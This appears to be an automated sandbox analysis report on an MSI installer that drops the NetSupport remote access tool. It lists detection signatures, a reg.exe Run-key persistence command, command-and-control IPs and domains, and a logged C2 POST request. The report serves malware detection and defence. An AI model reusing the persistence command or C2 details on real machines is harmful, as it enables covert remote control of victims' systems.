Edit tour

Windows Analysis Report
72BF1aHUKl.msi

Overview

General Information

Sample name:	72BF1aHUKl.msi renamed because original name is a hash value
Original sample name:	a6b7839d287c71e8c724df8cc024c4f7d7ae9057.msi
Analysis ID:	1552423
MD5:	999440b3b0609a7fa2f06f4d07fa8e6e
SHA1:	a6b7839d287c71e8c724df8cc024c4f7d7ae9057
SHA256:	2a0f495cd25dcbf02b2b0b11032d32a0460c9b7c5ad491afa4060ea3ca675f90
Tags:	msiuser-NDA0E
Infos:

Detection

NetSupport RAT

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

AI detected suspicious sample

Contains functionalty to change the wallpaper

Delayed program exit found

Abnormal high CPU Usage

Adds / modifies Windows certificates

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 2464 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\72BF1aHUKl.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 5504 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

client32.exe (PID: 2468 cmdline: "C:\ProgramData\MScreenConnect\client32.exe" MD5: F6ABEF857450C97EA74CD8F0EB9A8C0A)

reg.exe (PID: 6668 cmdline: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ScreenConnect /t REG_SZ /d "C:\ProgramData\MScreenConnect\client32.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)

conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

client32.exe (PID: 5596 cmdline: "C:\ProgramData\MScreenConnect\client32.exe" MD5: F6ABEF857450C97EA74CD8F0EB9A8C0A)

client32.exe (PID: 7056 cmdline: "C:\ProgramData\MScreenConnect\client32.exe" MD5: F6ABEF857450C97EA74CD8F0EB9A8C0A)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\ProgramData\MScreenConnect\AudioCapture.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\MScreenConnect\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\MScreenConnect\client32.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\MScreenConnect\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\MScreenConnect\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\MScreenConnect\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\ProgramData\MScreenConnect\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2133222658.0000000000832000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.2214849103.00000000111CD000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000000.2132289855.0000000000832000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.2214336000.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.2214132599.0000000000832000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000003.00000002.4452509174.0000000000832000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.2133757091.00000000111CD000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000003.00000000.2033005646.0000000000832000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000000.2213191011.0000000000832000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.2133358157.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 2468	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 2468	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 5596	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 5596	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 7056	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 7056	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author
8.2.client32.exe.6fbb0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.0.client32.exe.830000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
3.0.client32.exe.830000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.830000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.830000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.6fbb0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.6e0e0000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
3.2.client32.exe.6fbb0000.6.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.0.client32.exe.830000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.6e0e0000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
3.2.client32.exe.6e0e0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
3.2.client32.exe.830000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
3.2.client32.exe.111a3f08.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
3.2.client32.exe.111a3f08.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.111a3f08.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
8.2.client32.exe.111a3f08.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.111a3f08.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.client32.exe.111a3f08.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
3.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
3.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
8.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 19 entries

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\MScreenConnect\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 6668, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ScreenConnect

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ScreenConnect /t REG_SZ /d "C:\ProgramData\MScreenConnect\client32.exe", CommandLine: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ScreenConnect /t REG_SZ /d "C:\ProgramData\MScreenConnect\client32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\msiexec.exe /V, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 5504, ParentProcessName: msiexec.exe, ProcessCommandLine: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ScreenConnect /t REG_SZ /d "C:\ProgramData\MScreenConnect\client32.exe", ProcessId: 6668, ProcessName: reg.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ScreenConnect /t REG_SZ /d "C:\ProgramData\MScreenConnect\client32.exe", CommandLine: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ScreenConnect /t REG_SZ /d "C:\ProgramData\MScreenConnect\client32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\msiexec.exe /V, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 5504, ParentProcessName: msiexec.exe, ProcessCommandLine: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ScreenConnect /t REG_SZ /d "C:\ProgramData\MScreenConnect\client32.exe", ProcessId: 6668, ProcessName: reg.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T19:00:12.860365+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.5	49713	TCP
2024-11-08T19:00:51.765321+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.5	49898	TCP

ETPRO MALWARE NetSupport RAT CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T18:59:50.608310+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.5	49710	95.179.156.158	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 72BF1aHUKl.msi

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110A57F0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		3_2_110A57F0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_110A57F0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		6_2_110A57F0

Source: C:\ProgramData\MScreenConnect\client32.exe

File opened: C:\ProgramData\MScreenConnect\MSVCR100.dll

Jump to behavior

Source:	Binary string: uimanagerbrokerps.pdb source: UIManagerBrokerps.dll.1.dr
Source:	Binary string: ir41_qcx.pdb source: ir41_qcx.dll.1.dr
Source:	Binary string: appverifUI.pdbGCTL source: appverifUI.dll.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1280\1280\ctl32\release_unicode\pcichek.pdb source: client32.exe, 00000003.00000002.4454401118.000000006FBB2000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000006.00000002.2134785054.000000006FBB2000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000008.00000002.2215514219.000000006FBB2000.00000002.00000001.01000000.00000005.sdmp, PCICHEK.DLL.1.dr
Source:	Binary string: ir50_32.pdb source: ir50_32.dll.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdb source: client32.exe, 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr
Source:	Binary string: stub.pdbGCTL source: dpnathlp.dll.1.dr, dpnhupnp.dll.1.dr, dpnlobby.dll.1.dr
Source:	Binary string: icmp.pdbGCTL source: icmp.dll.1.dr
Source:	Binary string: smalldll.pdbGCTL source: dxmasf.dll.1.dr
Source:	Binary string: W:\ws\workspace\VBR\12.1.0\12.1.0\Backup\Veeam.Backup.Model\obj\Release\Veeam.Backup.Model.pdbO source: Veeam.Backup.Model.dll.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f12\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.1.dr
Source:	Binary string: icmp.pdb source: icmp.dll.1.dr
Source:	Binary string: winrssrv.pdbGCTL source: winrssrv.dll.1.dr
Source:	Binary string: wiatrace.pdb source: wiatrace.dll.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1280\1280\ctl32\release_unicode\pcicapi.pdb source: client32.exe, 00000003.00000002.4454308321.000000006E0E5000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000006.00000002.2134225146.000000006E0E5000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000008.00000002.2215429065.000000006E0E5000.00000002.00000001.01000000.00000006.sdmp, pcicapi.dll.1.dr
Source:	Binary string: E:\DNA\DNABuilds\DNA450\DNA450F3i1\client32\release_unicode_2015\dnarc.pdb source: client32.exe, 00000003.00000002.4452509174.0000000000832000.00000002.00000001.01000000.00000003.sdmp, client32.exe, 00000003.00000000.2033005646.0000000000832000.00000002.00000001.01000000.00000003.sdmp, client32.exe, 00000006.00000002.2133222658.0000000000832000.00000002.00000001.01000000.00000003.sdmp, client32.exe, 00000006.00000000.2132289855.0000000000832000.00000002.00000001.01000000.00000003.sdmp, client32.exe, 00000008.00000002.2214132599.0000000000832000.00000002.00000001.01000000.00000003.sdmp, client32.exe, 00000008.00000000.2213191011.0000000000832000.00000002.00000001.01000000.00000003.sdmp, client32.exe.1.dr
Source:	Binary string: vfcompat.pdb source: vfcompat.dll.1.dr
Source:	Binary string: smalldll.pdb source: dxmasf.dll.1.dr
Source:	Binary string: E:\nsmsrc\NSN\300\CVA_300F1\Ctl32\release\htctl32.pdb source: client32.exe, 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmp, HTCTL32.DLL.1.dr
Source:	Binary string: winrssrv.pdb source: winrssrv.dll.1.dr
Source:	Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000003.00000002.4454151326.000000006CE81000.00000020.00000001.01000000.00000007.sdmp, client32.exe, 00000006.00000002.2134025451.000000006CE81000.00000020.00000001.01000000.00000007.sdmp, client32.exe, 00000008.00000002.2215261938.000000006CE81000.00000020.00000001.01000000.00000007.sdmp, msvcr100.dll.1.dr
Source:	Binary string: appverifUI.pdb source: appverifUI.dll.1.dr
Source:	Binary string: ir50_32.pdbGCTL source: ir50_32.dll.1.dr
Source:	Binary string: uimanagerbrokerps.pdbGCTL source: UIManagerBrokerps.dll.1.dr
Source:	Binary string: vfcompat.pdbGCTL source: vfcompat.dll.1.dr
Source:	Binary string: wiatrace.pdbUGP source: wiatrace.dll.1.dr
Source:	Binary string: WFAPIGP.pdb source: wfapigp.dll.1.dr
Source:	Binary string: W:\ws\workspace\VBR\12.1.0\12.1.0\Backup\Veeam.Backup.Model\obj\Release\Veeam.Backup.Model.pdb source: Veeam.Backup.Model.dll.1.dr
Source:	Binary string: WerEnc.pdb source: WerEnc.dll.1.dr
Source:	Binary string: stub.pdb source: dpnathlp.dll.1.dr, dpnhupnp.dll.1.dr, dpnlobby.dll.1.dr
Source:	Binary string: GetUName.pdbGCTL source: getuname.dll.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.1.dr
Source:	Binary string: WFAPIGP.pdbUGP source: wfapigp.dll.1.dr
Source:	Binary string: GetUName.pdb source: getuname.dll.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.1.dr
Source:	Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.1.dr
Source:	Binary string: WerEnc.pdbGCTL source: WerEnc.dll.1.dr
Source:	Binary string: ir41_qcx.pdbGCTL source: ir41_qcx.dll.1.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11061140 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	3_2_11061140
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11065870 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,GetLastError,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,	3_2_11065870
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110B3B00 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	3_2_110B3B00
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	3_2_1102BB50
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_111180C0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	3_2_111180C0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110FE450 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	3_2_110FE450
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102BB50
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11061140 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	6_2_11061140
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11065870 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,GetLastError,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,	6_2_11065870
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_110B3B00 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	6_2_110B3B00
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_111180C0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	6_2_111180C0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_110FE450 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	6_2_110FE450

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.5:49710 -> 95.179.156.158:443

Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 172.67.68.212 172.67.68.212

Source: Joe Sandbox View

ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49713
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49898

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: armayalitim.com
Source: global traffic	DNS traffic detected: DNS query: armayalitim1722.com
Source: global traffic	DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

HTTP traffic detected: POST http://95.179.156.158/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 95.179.156.158Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:

